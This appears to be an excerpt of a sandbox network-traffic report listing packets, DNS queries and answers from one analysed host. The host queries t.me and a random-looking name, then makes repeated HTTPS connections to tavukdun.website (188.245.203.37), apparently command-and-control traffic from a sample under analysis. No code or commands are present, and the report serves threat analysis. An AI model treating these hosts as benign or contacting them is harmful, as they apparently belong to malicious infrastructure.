Nov 1, 2024 20:58:36.443109035 CET	58992	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:36.443559885 CET	58992	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:36.443605900 CET	443	58992	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:36.445652962 CET	58992	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:36.445700884 CET	443	58992	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:37.195166111 CET	443	58992	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:37.195384979 CET	443	58992	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:37.195393085 CET	58992	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:37.195499897 CET	58992	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:37.195576906 CET	58992	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:37.195646048 CET	443	58992	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:37.196463108 CET	58993	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:37.196542978 CET	443	58993	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:37.196719885 CET	58993	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:37.196919918 CET	58993	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:37.196970940 CET	443	58993	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:37.570704937 CET	443	58993	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:37.570925951 CET	58993	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:37.571247101 CET	58993	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:37.571291924 CET	443	58993	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:37.572395086 CET	58993	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:37.572439909 CET	443	58993	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:38.334150076 CET	443	58993	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:38.334323883 CET	58993	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:38.334342003 CET	443	58993	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:38.334539890 CET	58993	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:38.334588051 CET	58993	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:38.334640026 CET	443	58993	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:38.339847088 CET	58994	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:38.339920998 CET	443	58994	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:38.340150118 CET	58994	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:38.340276003 CET	58994	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:38.340303898 CET	443	58994	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:38.713980913 CET	443	58994	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:38.714267969 CET	58994	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:38.714607000 CET	58994	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:38.714622974 CET	443	58994	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:38.715796947 CET	58994	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:38.715811968 CET	443	58994	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:39.498436928 CET	443	58994	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:39.498651981 CET	443	58994	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:39.498739958 CET	58994	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:39.498811960 CET	58994	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:39.499470949 CET	58994	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:39.499526978 CET	443	58994	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.411142111 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.411242008 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.411482096 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.411602020 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.411633015 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.787751913 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.788033009 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.788499117 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.788543940 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.790607929 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.790652037 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.790827990 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.790889978 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.790915966 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.790942907 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.791114092 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.791157961 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.791332006 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.791392088 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.791403055 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.791414976 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.791465998 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.791626930 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.791878939 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.791917086 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.792109013 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.792248011 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.792306900 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.792361975 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.792381048 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.792399883 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.792470932 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.792490959 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.792829037 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.792860031 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.793055058 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.793102980 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.793133020 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.793154001 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.793184042 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.793198109 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:40.793255091 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:40.793303013 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:42.193504095 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:42.193578005 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:42.193715096 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:42.193715096 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:42.193943024 CET	58995	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:42.193963051 CET	443	58995	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:42.197721958 CET	58996	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:42.197751999 CET	443	58996	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:42.197964907 CET	58996	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:42.198039055 CET	58996	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:42.198051929 CET	443	58996	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:42.568224907 CET	443	58996	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:42.568460941 CET	58996	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:42.568737984 CET	58996	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:42.568742037 CET	443	58996	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:42.571043015 CET	58996	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:42.571048975 CET	443	58996	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:43.322614908 CET	443	58996	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:43.322686911 CET	443	58996	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:43.322860956 CET	58996	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:43.322860956 CET	58996	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:43.323096991 CET	58996	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:43.323117018 CET	443	58996	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:43.324228048 CET	58997	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:43.324258089 CET	443	58997	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:43.324485064 CET	58997	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:43.324628115 CET	58997	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:43.324645996 CET	443	58997	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:43.696325064 CET	443	58997	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:43.696573019 CET	58997	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:43.696846962 CET	58997	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:43.696860075 CET	443	58997	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:43.698038101 CET	58997	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:43.698052883 CET	443	58997	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:44.453989983 CET	443	58997	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:44.454128027 CET	58997	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:44.454133987 CET	443	58997	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:44.454355001 CET	58997	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:44.454355001 CET	58997	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:44.763423920 CET	58997	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:44.763442039 CET	443	58997	188.245.203.37	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 20:50:56.199075937 CET	137	137	192.168.11.20	192.168.11.255
Nov 1, 2024 20:50:56.963038921 CET	137	137	192.168.11.20	192.168.11.255
Nov 1, 2024 20:50:57.728574038 CET	137	137	192.168.11.20	192.168.11.255
Nov 1, 2024 20:51:07.855622053 CET	137	137	192.168.11.20	192.168.11.255
Nov 1, 2024 20:51:08.614789963 CET	137	137	192.168.11.20	192.168.11.255
Nov 1, 2024 20:51:09.380245924 CET	137	137	192.168.11.20	192.168.11.255
Nov 1, 2024 20:51:09.434102058 CET	60528	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:51:09.615940094 CET	53	60528	1.1.1.1	192.168.11.20
Nov 1, 2024 20:52:59.016051054 CET	58556	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:52:59.110812902 CET	53	58556	1.1.1.1	192.168.11.20
Nov 1, 2024 20:52:59.819696903 CET	55653	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:52:59.927937984 CET	53	55653	1.1.1.1	192.168.11.20
Nov 1, 2024 20:53:11.923886061 CET	53	59569	1.1.1.1	192.168.11.20
Nov 1, 2024 20:53:12.005197048 CET	59318	1900	192.168.11.20	239.255.255.250
Nov 1, 2024 20:53:12.041999102 CET	53	59317	1.1.1.1	192.168.11.20
Nov 1, 2024 20:53:12.097083092 CET	62302	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:53:12.097193956 CET	53592	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:53:12.191612005 CET	53	53592	1.1.1.1	192.168.11.20
Nov 1, 2024 20:53:12.193386078 CET	53	62302	1.1.1.1	192.168.11.20
Nov 1, 2024 20:53:12.785367012 CET	53	57256	1.1.1.1	192.168.11.20
Nov 1, 2024 20:53:13.012101889 CET	59318	1900	192.168.11.20	239.255.255.250
Nov 1, 2024 20:53:14.025099993 CET	59318	1900	192.168.11.20	239.255.255.250
Nov 1, 2024 20:53:15.026505947 CET	59318	1900	192.168.11.20	239.255.255.250
Nov 1, 2024 20:53:15.991460085 CET	53	54552	1.1.1.1	192.168.11.20
Nov 1, 2024 20:56:03.422327042 CET	49962	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:56:03.524837971 CET	53	49962	1.1.1.1	192.168.11.20
Nov 1, 2024 20:57:41.816878080 CET	51562	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:57:41.912504911 CET	53	51562	1.1.1.1	192.168.11.20
Nov 1, 2024 20:57:54.005554914 CET	53	60031	1.1.1.1	192.168.11.20
Nov 1, 2024 20:57:54.048683882 CET	53927	1900	192.168.11.20	239.255.255.250
Nov 1, 2024 20:57:54.085381031 CET	53153	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:57:54.085524082 CET	51585	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:57:54.130070925 CET	53	53926	1.1.1.1	192.168.11.20
Nov 1, 2024 20:57:54.181433916 CET	53	53153	1.1.1.1	192.168.11.20
Nov 1, 2024 20:57:54.181525946 CET	53	51585	1.1.1.1	192.168.11.20
Nov 1, 2024 20:57:54.807847977 CET	53	57095	1.1.1.1	192.168.11.20
Nov 1, 2024 20:57:55.061295986 CET	53927	1900	192.168.11.20	239.255.255.250
Nov 1, 2024 20:57:56.072221994 CET	53927	1900	192.168.11.20	239.255.255.250
Nov 1, 2024 20:57:57.079906940 CET	53927	1900	192.168.11.20	239.255.255.250
Nov 1, 2024 20:57:57.602459908 CET	53	63050	1.1.1.1	192.168.11.20
Nov 1, 2024 20:58:14.321722984 CET	58424	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:14.446197987 CET	63477	1900	192.168.11.20	239.255.255.250
Nov 1, 2024 20:58:15.446383953 CET	63477	1900	192.168.11.20	239.255.255.250
Nov 1, 2024 20:58:15.470823050 CET	64619	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:15.471191883 CET	52090	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:15.565767050 CET	53	64619	1.1.1.1	192.168.11.20
Nov 1, 2024 20:58:15.567677021 CET	62869	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:15.568214893 CET	50932	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:16.447264910 CET	63477	1900	192.168.11.20	239.255.255.250
Nov 1, 2024 20:58:17.448482990 CET	63477	1900	192.168.11.20	239.255.255.250
Nov 1, 2024 20:58:17.569926023 CET	53999	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:17.591015100 CET	64366	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.065129995 CET	53761	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.096057892 CET	58597	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.112966061 CET	65232	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.112966061 CET	60464	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.132106066 CET	64441	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.191360950 CET	53	58597	1.1.1.1	192.168.11.20
Nov 1, 2024 20:58:18.208086014 CET	53	65232	1.1.1.1	192.168.11.20
Nov 1, 2024 20:58:18.208511114 CET	53	60464	1.1.1.1	192.168.11.20
Nov 1, 2024 20:58:18.395961046 CET	54906	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.485428095 CET	50635	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.491759062 CET	53	54906	1.1.1.1	192.168.11.20
Nov 1, 2024 20:58:18.554197073 CET	49499	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.572948933 CET	63897	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.580045938 CET	53	50635	1.1.1.1	192.168.11.20
Nov 1, 2024 20:58:18.608357906 CET	54798	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.614882946 CET	58763	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.625794888 CET	55337	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.648772955 CET	53	49499	1.1.1.1	192.168.11.20
Nov 1, 2024 20:58:18.650230885 CET	51734	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.703144073 CET	53	54798	1.1.1.1	192.168.11.20
Nov 1, 2024 20:58:18.709678888 CET	53	58763	1.1.1.1	192.168.11.20
Nov 1, 2024 20:58:18.720017910 CET	53	55337	1.1.1.1	192.168.11.20
Nov 1, 2024 20:58:18.746032000 CET	53	51734	1.1.1.1	192.168.11.20
Nov 1, 2024 20:58:18.764166117 CET	59921	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.764231920 CET	51112	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.854775906 CET	50819	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.858927011 CET	53	59921	1.1.1.1	192.168.11.20
Nov 1, 2024 20:58:18.859982967 CET	53	51112	1.1.1.1	192.168.11.20
Nov 1, 2024 20:58:18.923039913 CET	64025	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:18.927824020 CET	63283	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:19.218216896 CET	56038	53	192.168.11.20	1.1.1.1
Nov 1, 2024 20:58:19.310554981 CET	56742	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.408319950 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.409189939 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.409301996 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.410427094 CET	56742	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.415138006 CET	56742	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.415242910 CET	56742	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.415478945 CET	56742	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.426748037 CET	56742	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.509773016 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.509778976 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.509783983 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.509788990 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.510091066 CET	56742	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.510185957 CET	56742	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.510535955 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.511121035 CET	56742	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.511343002 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.522139072 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.523515940 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.523765087 CET	56742	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.529202938 CET	56742	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.604598999 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.606466055 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.607214928 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.607511044 CET	56742	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.624666929 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.626394987 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.646986961 CET	56742	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.698956013 CET	56742	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.742032051 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.742954016 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.768495083 CET	56742	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.794763088 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.795806885 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.821109056 CET	56742	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.908847094 CET	56742	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:20.003988981 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:20.004856110 CET	443	56742	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:20.031395912 CET	56742	443	192.168.11.20	172.64.41.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 1, 2024 20:51:09.434102058 CET	192.168.11.20	1.1.1.1	0xcf50	Standard query (0)	oknYaGWfCKieeGw.oknYaGWfCKieeGw	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:52:59.016051054 CET	192.168.11.20	1.1.1.1	0xf275	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:52:59.819696903 CET	192.168.11.20	1.1.1.1	0xb920	Standard query (0)	tavukdun.website	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:53:12.097083092 CET	192.168.11.20	1.1.1.1	0xf936	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:53:12.097193956 CET	192.168.11.20	1.1.1.1	0x2795	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 1, 2024 20:56:03.422327042 CET	192.168.11.20	1.1.1.1	0x5fa1	Standard query (0)	oknYaGWfCKieeGw.oknYaGWfCKieeGw	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:57:41.816878080 CET	192.168.11.20	1.1.1.1	0xba54	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:57:54.085381031 CET	192.168.11.20	1.1.1.1	0x9072	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:57:54.085524082 CET	192.168.11.20	1.1.1.1	0x2ab2	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 1, 2024 20:58:14.321722984 CET	192.168.11.20	1.1.1.1	0x752c	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:15.470823050 CET	192.168.11.20	1.1.1.1	0xca31	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:15.471191883 CET	192.168.11.20	1.1.1.1	0xa763	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:15.567677021 CET	192.168.11.20	1.1.1.1	0x2b8c	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:15.568214893 CET	192.168.11.20	1.1.1.1	0x666b	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:17.569926023 CET	192.168.11.20	1.1.1.1	0xc5aa	Standard query (0)	browser.events.data.msn.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:17.591015100 CET	192.168.11.20	1.1.1.1	0xe24d	Standard query (0)	deff.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.065129995 CET	192.168.11.20	1.1.1.1	0x5ad5	Standard query (0)	px.ads.linkedin.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.096057892 CET	192.168.11.20	1.1.1.1	0xc389	Standard query (0)	trc.taboola.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.112966061 CET	192.168.11.20	1.1.1.1	0xd117	Standard query (0)	sync.outbrain.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.112966061 CET	192.168.11.20	1.1.1.1	0x627c	Standard query (0)	pr-bh.ybp.yahoo.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.132106066 CET	192.168.11.20	1.1.1.1	0xa531	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.395961046 CET	192.168.11.20	1.1.1.1	0xcf46	Standard query (0)	hbx.media.net	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.485428095 CET	192.168.11.20	1.1.1.1	0x4339	Standard query (0)	cm.mgid.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.554197073 CET	192.168.11.20	1.1.1.1	0xdbf6	Standard query (0)	eb2.3lift.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.572948933 CET	192.168.11.20	1.1.1.1	0xb1c5	Standard query (0)	m.adnxs.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.608357906 CET	192.168.11.20	1.1.1.1	0x386e	Standard query (0)	code.yengo.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.614882946 CET	192.168.11.20	1.1.1.1	0xc958	Standard query (0)	visitor.omnitagjs.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.625794888 CET	192.168.11.20	1.1.1.1	0x3e3c	Standard query (0)	trace.mediago.io	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.650230885 CET	192.168.11.20	1.1.1.1	0x4cbb	Standard query (0)	trace.popin.cc	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.764166117 CET	192.168.11.20	1.1.1.1	0x5857	Standard query (0)	dns.quad9.net	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.764231920 CET	192.168.11.20	1.1.1.1	0x9062	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.854775906 CET	192.168.11.20	1.1.1.1	0xfd3c	Standard query (0)	r.msftstatic.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.923039913 CET	192.168.11.20	1.1.1.1	0xf46b	Standard query (0)	ib.adnxs.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.927824020 CET	192.168.11.20	1.1.1.1	0xc4a	Standard query (0)	sync.inmobi.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:19.218216896 CET	192.168.11.20	1.1.1.1	0xf885	Standard query (0)	ecn.dev.virtualearth.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 1, 2024 20:51:09.615940094 CET	1.1.1.1	192.168.11.20	0xcf50	Name error (3)	oknYaGWfCKieeGw.oknYaGWfCKieeGw	none	none	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:52:59.110812902 CET	1.1.1.1	192.168.11.20	0xf275	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:52:59.927937984 CET	1.1.1.1	192.168.11.20	0xb920	No error (0)	tavukdun.website		188.245.203.37	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:53:12.191612005 CET	1.1.1.1	192.168.11.20	0x2795	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 1, 2024 20:53:12.193386078 CET	1.1.1.1	192.168.11.20	0xf936	No error (0)	www.google.com		142.251.40.132	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:56:03.524837971 CET	1.1.1.1	192.168.11.20	0x5fa1	Name error (3)	oknYaGWfCKieeGw.oknYaGWfCKieeGw	none	none	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:57:41.912504911 CET	1.1.1.1	192.168.11.20	0xba54	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:57:54.181433916 CET	1.1.1.1	192.168.11.20	0x9072	No error (0)	www.google.com		142.250.65.164	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:57:54.181525946 CET	1.1.1.1	192.168.11.20	0x2ab2	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 1, 2024 20:58:14.416940928 CET	1.1.1.1	192.168.11.20	0x752c	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
